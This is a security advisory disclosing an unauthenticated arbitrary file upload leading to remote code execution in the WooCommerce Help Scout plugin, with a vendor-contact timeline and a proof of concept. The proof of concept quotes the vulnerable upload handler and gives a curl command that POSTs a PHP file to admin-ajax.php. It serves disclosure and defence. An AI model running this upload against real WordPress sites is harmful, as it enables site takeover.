WooCommerce Help Scout < 2.9.1 - Unauthenticated Arbitrary File Upload leading to RCE
We noticed 0-day in the plugin (https://woocommerce.com/products/woocommerce-help-scout/) being actively exploited. This vulnerability affects at least versions 2.6-2.8 (current latest published version) and allows unauthenticated users to upload any files to the site which by default will end up in wp-content/uploads/hstmp.
Until a patch is available, the plugin should be disabled.
March 20th, 2021:
- Tried to reach the vendor via https://opmc.com.au, got blocked when sending contact message "Access from your Country was disabled by the administrator."
- Tried to open a ticket on woocommerce.com, couldn't even though email address was verified
- 2:49pm GMT+1, Reached WooCommerce via DM on Twitter, asking for a direct contact/email address. Reply received at 6:52pm GMT+1
- 8:42pm GMT+1 Details sent to that email address
March 23rd, 2021 - v2.9 released, which does not fix the issue. Vendor is working on another fix and we are in touch with them
March 25th, 2021 - v2.9.1 released, fixing the arbitrary PHP upload. However, an image with PHP code inside could still be uploaded and used in combination with a LFI. Hardening recommendation sent to vendor.
Proof of Concept
In file /woocommerce-help-scout/includes/class-wc-help-scout-ajax.php there is class WC_Help_Scout_Ajax
with constructor initializing action
add_action( 'wp_ajax_nopriv_wc_help_scout_upload_attachments', array( $this, 'wc_help_scout_upload_attachments' ) );
which reads uploaded $_FILES and then executes
$target_path_sia = $_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],$dir. "/hstmp/" . $target_path_sia);
Ie. attacker can run
echo '<?php echo "Hello World!";' > helloworld.php
curl -X POST -F [email protected] https://<site>/wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments
to exploit this vuln.